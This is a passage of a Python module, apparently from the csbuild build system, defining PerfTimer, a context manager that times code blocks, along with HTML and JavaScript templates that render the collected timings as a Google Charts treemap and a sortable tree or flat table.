-webkit-linear-gradient(top, rgba(235,233,249,1) 0%, rgba(216,208,239,1) 50%, rgba(206,199,236,1) 51%, rgba(193,191,234,1) 100%);\n\t\t\t\tbackground: -o-linear-gradient(top, rgba(235,233,249,1) 0%, rgba(216,208,239,1) 50%, rgba(206,199,236,1) 51%, rgba(193,191,234,1) 100%);\n\t\t\t\tbackground: -ms-linear-gradient(top, rgba(235,233,249,1) 0%, rgba(216,208,239,1) 50%, rgba(206,199,236,1) 51%, rgba(193,191,234,1) 100%);\n\t\t\t\tbackground: linear-gradient(to bottom, rgba(235,233,249,1) 0%, rgba(216,208,239,1) 50%, rgba(206,199,236,1) 51%, rgba(193,191,234,1) 100%);\n\t\t\t\tfilter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ebe9f9', endColorstr='#c1bfea', GradientType=0 );\n\t\t\t}}\n\t\t</style>\n\t</HEAD>\n\t<BODY onload=\"checkScriptLoaded()\">\n\t\t<div id=\"errorbar\" style=\"background-color:#ff0000\"></div>\n\t\t<script type=\"text/javascript\" src=\"https://www.gstatic.com/charts/loader.js\" onload=\"scriptLoaded=true;\" ></script>\n\t\t<h1>Perf Report: <i>{0}</i></h1>\n\"\"\"\n\n_blocks = [\n\"\"\"\t\t<div style=\"margin:2px 10px;padding: 5px 10px;background-color:lavender;border: 1px solid grey;\">\n\t\t\t<h3>{1}</h3>\n\n\t\t\t<div id=\"chart_div_{0}\"></div>\n\t\t\t<script type=\"text/javascript\">\n\t\t\t\tgoogle.charts.load(\"current\", {{\"packages\":[\"treemap\"]}});\n\t\t\t\tgoogle.charts.setOnLoadCallback(drawChart);\n\t\t\t\tfunction drawChart() {{\n\t\t\t\t\tvar data = new google.visualization.DataTable();\n\t\t\t\t\tdata.addColumn(\"string\", \"ID\");\n\t\t\t\t\tdata.addColumn(\"string\", \"Parent\");\n\t\t\t\t\tdata.addColumn(\"number\", \"Exclusive Time in Seconds\");\n\t\t\t\t\tdata.addColumn(\"number\", \"Inclusive time in seconds\");\n\t\t\t\t\tdata.addRows([\n\"\"\",\n\"\"\"\t\t\t\t\t]);\n\t\t\t\t\tvar tree = new google.visualization.TreeMap(document.getElementById(\"chart_div_{0}\"));\n\t\t\t\t\tfunction showFullTooltip(row, size, value) {{\n\t\t\t\t\t\treturn '<div style=\"background:#fd9; padding:10px; border-style:solid\">' +\n\t\t\t\t\t\t'<span style=\"font-family:Courier\"><b>' +\n\t\t\t\t\t\tdata.getValue(row, 0).split(\"\\x0b\").join(\"\").split(\"<\").join(\"&lt;\").split(\">\").join(\"&gt;\")\n\t\t\t\t\t\t+ ':</b>' + _formatTime(data.getValue(row, 2)) + ' seconds</span></div>'\n\t\t\t\t\t}}\n\t\t\t\t\tvar options = {{\n\t\t\t\t\t\thighlightOnMouseOver: true,\n\t\t\t\t\t\tmaxDepth: 1,\n\t\t\t\t\t\tmaxPostDepth: 20,\n\t\t\t\t\t\tminHighlightColor: \"#80a0ff\",\n\t\t\t\t\t\tmidHighlightColor: \"#ffffff\",\n\t\t\t\t\t\tmaxHighlightColor: \"#ff0000\",\n\t\t\t\t\t\tminColor: \"#7390E6\",\n\t\t\t\t\t\tmidColor: \"#E6E6E6\",\n\t\t\t\t\t\tmaxColor: \"#e60000\",\n\t\t\t\t\t\theaderHeight: 15,\n\t\t\t\t\t\tshowScale: false,\n\t\t\t\t\t\theight: 500,\n\t\t\t\t\t\tuseWeightedAverageForAggregation: true,\n\t\t\t\t\t\tgenerateTooltip: showFullTooltip\n\t\t\t\t\t}};\n\t\t\t\t\ttree.draw(data, options);\n\t\t\t\t}}\n\t\t\t</script>\n\t\t\t<script type=\"text/javascript\">\n\t\t\t\tvar datas_{0} = [\n\"\"\",\n\"\"\"\t\t\t\tfunction HideChildren_{0}(parentId) {{\n\t\t\t\t\t\tclassName = '{0}_Parent_' + parentId\n\t\t\t\t\t\telems = document.getElementsByClassName(className)\n\t\t\t\t\t\tarrowElem = document.getElementById(\"arrow_{0}_\"+parentId)\n\t\t\t\t\t\tfor(var i = 0; i < elems.length; ++i) {{\n\t\t\t\t\t\t\tvar elem = elems[i]\n\t\t\t\t\t\t\tif(elem.style.maxHeight == '0px') {{\n\t\t\t\t\t\t\t\telem.style.maxHeight=elem.rememberMaxHeight\n\t\t\t\t\t\t\t\tarrowElem.innerHTML = '&#x25bc;'\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t{{\n\t\t\t\t\t\t\t\telem.style.maxHeight='0px'\n\t\t\t\t\t\t\t\tarrowElem.innerHTML = '&#x25b6;'\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t}}\n\n\t\t\t\t\tvar mode_{0} = \"tree\"\n\n\t\t\t\t\tfunction Flatten_{0}() {{\n\t\t\t\t\t\tret = {{}}\n\t\t\t\t\t\tfunction recurse(datas) {{\n\t\t\t\t\t\t\tif(datas.length == 0) {{\n\t\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\tfor(var i = 0; i < datas.length; ++i) {{\n\t\t\t\t\t\t\t\tif(datas[i][0] in ret) {{\n\t\t\t\t\t\t\t\t\titem = ret[datas[i][0]]\n\t\t\t\t\t\t\t\t\titem[0] += datas[i][1]\n\t\t\t\t\t\t\t\t\titem[1] += datas[i][2]\n\t\t\t\t\t\t\t\t\titem[2] += datas[i][3]\n\t\t\t\t\t\t\t\t\titem[3] += datas[i][4]\n\t\t\t\t\t\t\t\t\titem[4] += datas[i][5]\n\t\t\t\t\t\t\t\t\titem[5] += datas[i][6]\n\t\t\t\t\t\t\t\t\titem[6] += datas[i][7]\n\t\t\t\t\t\t\t\t\titem[7] += datas[i][8]\n\t\t\t\t\t\t\t\t\titem[8] += datas[i][9]\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\telse {{\n\t\t\t\t\t\t\t\t\tret[datas[i][0]] = [\n\t\t\t\t\t\t\t\t\t\tdatas[i][1],\n\t\t\t\t\t\t\t\t\t\tdatas[i][2],\n\t\t\t\t\t\t\t\t\t\tdatas[i][3],\n\t\t\t\t\t\t\t\t\t\tdatas[i][4],\n\t\t\t\t\t\t\t\t\t\tdatas[i][5],\n\t\t\t\t\t\t\t\t\t\tdatas[i][6],\n\t\t\t\t\t\t\t\t\t\tdatas[i][7],\n\t\t\t\t\t\t\t\t\t\tdatas[i][8],\n\t\t\t\t\t\t\t\t\t\tdatas[i][9]\n\t\t\t\t\t\t\t\t\t];\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\trecurse(datas[i][10]);\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t\trecurse(datas_{0});\n\t\t\t\t\t\tretArray = []\n\t\t\t\t\t\tfor(var key in ret) {{\n\t\t\t\t\t\t\titem = ret[key]\n\t\t\t\t\t\t\tretArray.push([\n\t\t\t\t\t\t\t\tkey,\n\t\t\t\t\t\t\t\titem[0],\n\t\t\t\t\t\t\t\titem[1],\n\t\t\t\t\t\t\t\titem[2],\n\t\t\t\t\t\t\t\titem[3],\n\t\t\t\t\t\t\t\titem[4],\n\t\t\t\t\t\t\t\titem[5],\n\t\t\t\t\t\t\t\titem[6],\n\t\t\t\t\t\t\t\titem[7],\n\t\t\t\t\t\t\t\titem[8],\n\t\t\t\t\t\t\t\t[]\n\t\t\t\t\t\t\t]);\n\t\t\t\t\t\t}}\n\t\t\t\t\t\treturn retArray;\n\t\t\t\t\t}}\n\n\t\t\t\t\tvar prevSortKey_{0} = 1\n\t\t\t\t\tvar prevSortType_{0} = -1\n\t\t\t\t\tvar maxId_{0} = -1\n\t\t\t\t\tfunction Populate_{0}(sortKey) {{\n\t\t\t\t\t\tvar sortType = 1\n\t\t\t\t\t\tif(sortKey == 0) {{\n\t\t\t\t\t\t\tsortType = -1\n\t\t\t\t\t\t}}\n\t\t\t\t\t\tif(prevSortKey_{0} == sortKey && prevSortType_{0} == sortType) {{\n\t\t\t\t\t\t\tsortType *= -1\n\t\t\t\t\t\t}}\n\t\t\t\t\t\tprevSortKey_{0} = sortKey\n\t\t\t\t\t\tprevSortType_{0} = sortType\n\n\t\t\t\t\t\telem = document.getElementById(\"stack_{0}\")\n\t\t\t\t\t\tbg1 = \"#DFDFF2\"\n\t\t\t\t\t\tbg2 = \"#D3D3E6\"\n\t\t\t\t\t\tvar s = '<div style=\"border:1px solid black\"><div style=\"font-weight:bold;border-bottom:1px solid black;\" class=\"gradient\">'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:37%;display:inline-block;text-align:center;\" onclick=\"Populate_{0}(0)\">Block</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(1)\">Inclusive</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(2)\">Exclusive</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(3)\">Count</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(4)\">Inclusive Max</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(5)\">Inclusive Min</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(6)\">Inclusive Mean</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(7)\">Exclusive Max</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(8)\">Exclusive Min</span>'\n\t\t\t\t\t\ts += '<span class=\"hoversort\" style=\"width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;\" onclick=\"Populate_{0}(9)\">Exclusive Mean</span>'\n\t\t\t\t\t\ts += '</div>'\n\t\t\t\t\t\tvar id = 1\n\t\t\t\t\t\tfunction recurse(oneLevel, depth, parentId) {{\n\t\t\t\t\t\t\toneLevel = oneLevel.sort(function(a, b) {{\n\t\t\t\t\t\t\t\tvar x = a[sortKey]; var y = b[sortKey];\n\t\t\t\t\t\t\t\treturn ((x < y) ? 1 : ((x > y) ? -1 : 0)) * sortType;\n\t\t\t\t\t\t\t}});\n\t\t\t\t\t\t\tfor(var i=0; i < oneLevel.length; ++i) {{\n\t\t\t\t\t\t\t\tvar thisId = id;\n\t\t\t\t\t\t\t\tid += 1;\n\t\t\t\t\t\t\t\tif(thisId %2 == 0) {{\n\t\t\t\t\t\t\t\t\tbg1 = \"#C8C6F2\"\n\t\t\t\t\t\t\t\t\tbg2 = \"#B3B1D9\"\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\telse {{\n\t\t\t\t\t\t\t\t\tbg1 = \"#BDBBE6\"\n\t\t\t\t\t\t\t\t\tbg2 = \"#A8A7CC\"\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\ts += '<div style=\"width:100%;overflow:hidden;transition:max-height 0.5s linear\" class=\"{0}_Parent_'+parentId+'\", id=\"{0}_'+thisId+'\">'\n\t\t\t\t\t\t\t\ts += '<div style=\"line-height:22px;\"><span style=\"height:100%;width:37%;display:inline-block;background-color:'+bg1+'\" '\n\t\t\t\t\t\t\t\tif(oneLevel[i][10].length != 0) {{\n\t\t\t\t\t\t\t\t\ts += 'class=\"hoversort\" onclick=\"HideChildren_{0}(\\\\''+thisId+'\\\\')\"'\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\ts += '><span style=\"width:20px;display:inline-block;margin-left:' + (depth * 15) + 'px;\" id=\"arrow_{0}_'+thisId+'\">'\n\t\t\t\t\t\t\t\tif(oneLevel[i][10].length != 0) {{\n\t\t\t\t\t\t\t\t\ts += '&#x25bc;'\n\t\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t\t\ts += '</span>' + oneLevel[i][0] + '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][1])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][1]/totals_{0}[0] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg1+'\">' + _formatTime(oneLevel[i][2])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][2]/totals_{0}[0] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + oneLevel[i][3]\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][3]/totals_{0}[1] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg1+'\">' + _formatTime(oneLevel[i][4])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][4]/totals_{0}[2] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][5])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][5]/totals_{0}[3] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][6])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][6]/totals_{0}[4] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][7])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][7]/totals_{0}[5] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][8])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][8]/totals_{0}[6] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span>'\n\t\t\t\t\t\t\t\ts += '<span style=\"height:100%;width:7%;display:inline-block;border-left:1px solid black;margin-left:-1px;text-align:center;background-color:'+bg2+'\">' + _formatTime(oneLevel[i][9])\n\t\t\t\t\t\t\t\ts += '<div class=\"percentbar\", style=\"width:' + Math.min(100,oneLevel[i][9]/totals_{0}[7] * 100) + '%;\"></div>'\n\t\t\t\t\t\t\t\ts += '</span></div>'\n\t\t\t\t\t\t\t\trecurse(oneLevel[i][10], depth + 1, thisId)\n\t\t\t\t\t\t\t\ts += \"</div>\"\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t\tvar datas;\n\t\t\t\t\t\tif(mode_{0} == \"flat\") {{\n\t\t\t\t\t\t\tdatas = Flatten_{0}();\n\t\t\t\t\t\t}}\n\t\t\t\t\t\telse {{\n\t\t\t\t\t\t\tdatas = datas_{0};\n\t\t\t\t\t\t}}\n\t\t\t\t\t\trecurse(datas, 0, 0)\n\t\t\t\t\t\ts += '</div>'\n\t\t\t\t\t\telem.innerHTML = s\n\t\t\t\t\t\tfor(var i = 0; i < id; ++i) {{\n\t\t\t\t\t\t\tclassName = '{0}_Parent_' + i\n\t\t\t\t\t\t\telems = document.getElementsByClassName(className)\n\t\t\t\t\t\t\tfor(var j = 0; j < elems.length; ++j) {{\n\t\t\t\t\t\t\t\tvar elem = elems[j]\n\t\t\t\t\t\t\t\telem.style.maxHeight = Math.max(22, elem.clientHeight) + \"px\"\n\t\t\t\t\t\t\t\telem.rememberMaxHeight = elem.style.maxHeight\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t\tmaxId_{0} = id\n\t\t\t\t\t}}\n\n\t\t\t\t\tfunction ExpandAll_{0}() {{\n\t\t\t\t\t\tfor(var i = 1; i < maxId_{0}; ++i) {{\n\t\t\t\t\t\t\tclassName = '{0}_Parent_' + i\n\t\t\t\t\t\t\telems = document.getElementsByClassName(className)\n\t\t\t\t\t\t\tarrowElem = document.getElementById(\"arrow_{0}_\"+i)\n\t\t\t\t\t\t\tfor(var j = 0; j < elems.length; ++j) {{\n\t\t\t\t\t\t\t\tvar elem = elems[j]\n\t\t\t\t\t\t\t\telem.style.maxHeight=elem.rememberMaxHeight\n\t\t\t\t\t\t\t\tarrowElem.innerHTML = '&#x25bc;'\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t\treturn false;\n\t\t\t\t\t}}\n\n\t\t\t\t\tfunction CollapseAll_{0}() {{\n\t\t\t\t\t\tfor(var i = 1; i < maxId_{0}; ++i) {{\n\t\t\t\t\t\t\tclassName = '{0}_Parent_' + i\n\t\t\t\t\t\t\telems = document.getElementsByClassName(className)\n\t\t\t\t\t\t\tarrowElem = document.getElementById(\"arrow_{0}_\"+i)\n\t\t\t\t\t\t\tfor(var j = 0; j < elems.length; ++j) {{\n\t\t\t\t\t\t\t\tvar elem = elems[j]\n\t\t\t\t\t\t\t\telem.style.maxHeight='0px'\n\t\t\t\t\t\t\t\tarrowElem.innerHTML = '&#x25b6;'\n\t\t\t\t\t\t\t}}\n\t\t\t\t\t\t}}\n\t\t\t\t\t\treturn false;\n\t\t\t\t\t}}\n\n\t\t\t\t\tfunction RenderTreeView_{0}() {{\n\t\t\t\t\t\tif(mode_{0} != \"tree\") {{\n\t\t\t\t\t\t\tmode_{0} = \"tree\";\n\t\t\t\t\t\t\tprevSortType_{0} *= -1\n\t\t\t\t\t\t\tPopulate_{0}(prevSortKey_{0})\n\t\t\t\t\t\t\telem = document.getElementById(\"expandcollapse_{0}\")\n\t\t\t\t\t\t\telem.style.opacity = 100\n\t\t\t\t\t\t\telem.style.visibility = \"visible\"\n\t\t\t\t\t\t}}\n\t\t\t\t\t\treturn false;\n\t\t\t\t\t}}\n\n\t\t\t\t\tfunction RenderFlatView_{0}() {{\n\t\t\t\t\t\tif(mode_{0} != \"flat\") {{\n\t\t\t\t\t\t\tmode_{0} = \"flat\";\n\t\t\t\t\t\t\tprevSortType_{0} *= -1\n\t\t\t\t\t\t\tPopulate_{0}(prevSortKey_{0})\n\t\t\t\t\t\t\telem = document.getElementById(\"expandcollapse_{0}\")\n\t\t\t\t\t\t\telem.style.opacity = 0\n\t\t\t\t\t\t\telem.style.visibility = \"hidden\"\n\t\t\t\t\t\t}}\n\t\t\t\t\t\treturn false;\n\t\t\t\t\t}}\n\n\t\t\t</script>\n\t\t\t<div>\n\t\t\t<div style=\"border:1px solid black;padding:0px 6px\">\n\t\t\t\t<div style=\"float:left;transition:opacity 0.5s, visibility 0.5s\" id=\"expandcollapse_{0}\">\n\t\t\t\t\t<a href=\"javascript:;\" onclick=\"ExpandAll_{0}()\">expand all</a> |\n\t\t\t\t\t<a href=\"javascript:;\" onclick=\"CollapseAll_{0}()\">collapse all</a>\n\t\t\t\t</div>\n\t\t\t\t&nbsp;\n\t\t\t\t<div style=\"float:right\">\n\t\t\t\t\tView as:\n\t\t\t\t\t<a href=\"javascript:;\" onclick=\"RenderTreeView_{0}()\">tree</a> |\n\t\t\t\t\t<a href=\"javascript:;\" onclick=\"RenderFlatView_{0}()\">flat</a>\n\t\t\t\t</div>\n\t\t\t</div>\n\t\t\t<div style=\"clear:left\" id=\"stack_{0}\"></div>\n\t\t\t</div>\n\t\t\t<script type=\"text/javascript\">Populate_{0}(1);</script>\n\t\t</div>\n\"\"\"\n]\n\n_htmlFooter = \"\"\"\t</BODY>\n</HTML>\"\"\"\n\n\ndef _formatTime(totaltime):\n\ttotalmin = math.floor(totaltime / 60)\n\ttotalsec = math.floor(totaltime % 60)\n\tmsec = math.floor((totaltime - math.floor(totaltime))*10000)\n\treturn \"{}:{:02}.{:04}\".format(int(totalmin), int(totalsec), int(msec))\n\nclass PerfTimer(object):\n\t\"\"\"\n\tPerformance timer to collect performance stats on csbuild to aid in diagnosing slow builds.\n\tUsed as a context manager around a block of code, will store cumulative execution time for that block.\n\n\t:param blockName: The name of the block to store execution for.\n\t:type blockName: str\n\t\"\"\"\n\tperfQueue = deque()\n\tperfStack = threading.local()\n\n\tdef __init__(self, blockName):\n\t\tif _collecting:\n\t\t\tself.blockName = blockName\n\t\t\tself.incstart = 0\n\t\t\tself.excstart = 0\n\t\t\tself.exclusive = 0\n\t\t\tself.inclusive = 0\n\t\t\tself.scopeName = blockName\n\n\tdef __enter__(self):\n\t\tif _collecting:\n\t\t\tnow = time.time()\n\t\t\ttry:\n\t\t\t\tprev = PerfTimer.perfStack.stack[-1]\n\t\t\t\tprev.exclusive += now - prev.excstart\n\t\t\t\tself.scopeName = prev.scopeName + \"::\" + self.blockName\n\n\t\t\t\tPerfTimer.perfStack.stack.append(self)\n\t\t\texcept:\n\t\t\t\tPerfTimer.perfStack.stack = [self]\n\n\t\t\tself.incstart = now\n\t\t\tself.excstart = now\n\n\tdef __exit__(self, excType, excVal, excTb):\n\t\tif _collecting:\n\t\t\tnow = time.time()\n\t\t\ttry:\n\t\t\t\tprev = PerfTimer.perfStack.stack[-2]\n\t\t\t\tprev.excstart = now\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t\tself.exclusive += now - self.excstart\n\t\t\tself.inclusive = now - self.incstart\n\n\t\t\tPerfTimer.perfQueue.append((self.scopeName, self.inclusive, self.exclusive, threading.current_thread().ident))\n\t\t\tPerfTimer.perfStack.stack.pop()\n\n\t@staticmethod\n\tdef PrintPerfReport(reportMode, output=None):\n\t\t\"\"\"\n\t\tPrint out all the collected data from PerfTimers in a heirarchical tree\n\n\t\t:param reportMode: :class:`ReportMode` enum value defining how the report is output to the user.\n\t\t:type reportMode: int\n\n\t\t:param output: When the report mode is \"flat\" or \"tree, this is a function that receives each line of output (defaults to stdout when None).\n\t\t When the report mode is \"html\", this is the name of the file dumped by the report (defaults to the name of the main module file + \"_PERF.html\" when None).\n\t\t:type output: None or :class:`collections.Callable` or str\n\t\t\"\"\"\n\n\t\tfullreport = {}\n\t\tthreadreports = {}\n\n\t\t#pylint: disable=missing-docstring\n\t\tclass Position(object):\n\t\t\tInclusive = 0\n\t\t\tExclusive = 1\n\t\t\tCount = 2\n\t\t\tMaxInc = 3\n\t\t\tMaxExc = 4\n\t\t\tMinInc = 5\n\t\t\tMinExc = 6\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tpair = PerfTimer.perfQueue.popleft()\n\t\t\t\tif reportMode == ReportMode.FLAT:\n\t\t\t\t\tsplit = pair[0].rsplit(\"::\", 1)\n\t\t\t\t\tif len(split) == 2:\n\t\t\t\t\t\tkey = split[1]\n\t\t\t\t\telse:\n\t\t\t\t\t\tkey = split[0]\n\t\t\t\t\tpair = (\n\t\t\t\t\t\tkey,\n\t\t\t\t\t\tpair[1],\n\t\t\t\t\t\tpair[2],\n\t\t\t\t\t\tpair[3]\n\t\t\t\t\t)\n\n\t\t\t\tfullreport.setdefault(pair[0], [0,0,0,0,0,999999999,999999999])\n\t\t\t\tfullreport[pair[0]][Position.Inclusive] += pair[1]\n\t\t\t\tfullreport[pair[0]][Position.Exclusive] += pair[2]\n\t\t\t\tfullreport[pair[0]][Position.Count] += 1\n\t\t\t\tfullreport[pair[0]][Position.MaxInc] = max(pair[1], fullreport[pair[0]][Position.MaxInc])\n\t\t\t\tfullreport[pair[0]][Position.MaxExc] = max(pair[2], fullreport[pair[0]][Position.MaxExc])\n\t\t\t\tfullreport[pair[0]][Position.MinInc] = min(pair[1], fullreport[pair[0]][Position.MinInc])\n\t\t\t\tfullreport[pair[0]][Position.MinExc] = min(pair[2], fullreport[pair[0]][Position.MinExc])\n\n\t\t\t\tthreadreport = threadreports.setdefault(pair[3], {})\n\t\t\t\tthreadreport.setdefault(pair[0], [0,0,0,0,0,999999999,999999999])\n\t\t\t\tthreadreport[pair[0]][Position.Inclusive] += pair[1]\n\t\t\t\tthreadreport[pair[0]][Position.Exclusive] += pair[2]\n\t\t\t\tthreadreport[pair[0]][Position.Count] += 1\n\t\t\t\tthreadreport[pair[0]][Position.MaxInc] = max(pair[1], threadreport[pair[0]][Position.MaxInc])\n\t\t\t\tthreadreport[pair[0]][Position.MaxExc] = max(pair[2], threadreport[pair[0]][Position.MaxExc])\n\t\t\t\tthreadreport[pair[0]][Position.MinInc] = min(pair[1], threadreport[pair[0]][Position.MinInc])\n\t\t\t\tthreadreport[pair[0]][Position.MinExc] = min(pair[2], threadreport[pair[0]][Position.MinExc])\n\t\t\texcept IndexError:\n\t\t\t\tbreak\n\n\t\tif not fullreport:\n\t\t\treturn\n\n\t\tif reportMode == ReportMode.HTML:\n\t\t\tif output is None:\n\t\t\t\toutput = os.path.join(os.path.dirname(sys.modules[\"__main__\"].__file__), os.path.basename(os.path.splitext(sys.modules[\"__main__\"].__file__)[0] + \"_PERF.html\"))\n\n\t\t\twith open(output, \"w\") as f:\n\t\t\t\t#pylint: disable=missing-docstring\n\t\t\t\tclass SharedLocals(object):\n\t\t\t\t\tidentifiers = {}\n\t\t\t\t\tlastId = {}\n\t\t\t\t\ttotalExc = 0\n\t\t\t\t\ttotalCount = 0\n\t\t\t\t\tmaxExcMean = 0\n\t\t\t\t\tmaxIncMean = 0\n\t\t\t\t\tmaxExcMax = 0\n\t\t\t\t\tmaxExcMin = 0\n\t\t\t\t\tmaxIncMax = 0\n\t\t\t\t\tmaxIncMin = 0\n\n\t\t\t\t#pylint: disable=invalid-name\n\t\t\t\tdef _getIdentifier(s):\n\t\t\t\t\t_,_,base = s.rpartition(\"::\")\n\t\t\t\t\tif s not in SharedLocals.identifiers:\n\t\t\t\t\t\tSharedLocals.identifiers[s] = SharedLocals.lastId.setdefault(base, 0)\n\t\t\t\t\t\tSharedLocals.lastId[base] += 1\n\t\t\t\t\treturn base + \"\\\\x0b\" * SharedLocals.identifiers[s]\n\n\t\t\t\tdef _recurseHtml(report, sortedKeys, prefix, printed, itemfmt, indent):\n\t\t\t\t\tfirst = True\n\t\t\t\t\tfor key in sortedKeys:\n\t\t\t\t\t\tif key in printed:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tif key.startswith(prefix):\n\t\t\t\t\t\t\treportEntry = report[key]\n\t\t\t\t\t\t\treportIncMean = reportEntry[Position.Inclusive] / reportEntry[Position.Count]\n\t\t\t\t\t\t\treportExcMean = reportEntry[Position.Exclusive] / reportEntry[Position.Count]\n\n\t\t\t\t\t\t\tprintkey = key.replace(prefix, \"\", 1)\n\t\t\t\t\t\t\tif printkey.find(\"::\") != -1:\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\tif not first:\n\t\t\t\t\t\t\t\tf.write(\"\\t\" * (indent+1))\n\t\t\t\t\t\t\t\tf.write(\"],\\n\")\n\t\t\t\t\t\t\tf.write(\"\\n\")\n\t\t\t\t\t\t\tf.write(\"\\t\" * (indent+1))\n\t\t\t\t\t\t\tf.write(\n\t\t\t\t\t\t\t\titemfmt.format(\n\t\t\t\t\t\t\t\t\tprintkey,\n\t\t\t\t\t\t\t\t\treportEntry[Position.Inclusive],\n\t\t\t\t\t\t\t\t\treportEntry[Position.Exclusive],\n\t\t\t\t\t\t\t\t\treportEntry[Position.Count],\n\t\t\t\t\t\t\t\t\treportEntry[Position.MaxInc],\n\t\t\t\t\t\t\t\t\treportEntry[Position.MinInc],\n\t\t\t\t\t\t\t\t\treportIncMean,\n\t\t\t\t\t\t\t\t\treportEntry[Position.MaxExc],\n\t\t\t\t\t\t\t\t\treportEntry[Position.MinExc],\n\t\t\t\t\t\t\t\t\treportExcMean,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t)\n\n\t\t\t\t\t\t\tSharedLocals.totalExc += reportEntry[Position.Exclusive]\n\t\t\t\t\t\t\tSharedLocals.totalCount += reportEntry[Position.Count]\n\t\t\t\t\t\t\tSharedLocals.maxExcMean = max(SharedLocals.maxExcMean, reportExcMean)\n\t\t\t\t\t\t\tSharedLocals.maxIncMean = 